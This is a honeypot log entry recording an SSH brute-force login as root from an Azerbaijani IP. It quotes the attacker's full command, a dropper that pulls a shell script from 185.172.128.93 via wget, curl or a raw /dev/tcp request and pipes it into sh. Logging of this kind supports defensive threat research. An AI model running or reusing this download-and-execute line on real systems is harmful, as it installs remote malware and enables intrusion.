Time | 2024/07/02, 09:42:19 (GMT) |
Transaction ID | DXXR41ITYR69UJNP |
Service | ssh |
Location | AZ (Azerbaijan) |
Attacker | 164.215.103.47 |
Classification | Web script execution |
Harm Potential | High |
164.215.103.47 client username 'root' and password 'linux@12345' entered 164.215.103.47 client command : 'uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; SC=$(wget -O- http://185.172.128.93/sh || curl http://185.172.128.93/sh); if [ $? -ne 0 ]; then exec 3<>"/dev/tcp/185.172.128.93/80"; echo -e "GET /sh HTTP/1.0\r\nHost: 185.172.128.93\r\n\r\n" >&3; (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 | sh -s ssh; exec 3>&-; else echo "$SC" | sh -s ssh; fi'
All observations are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |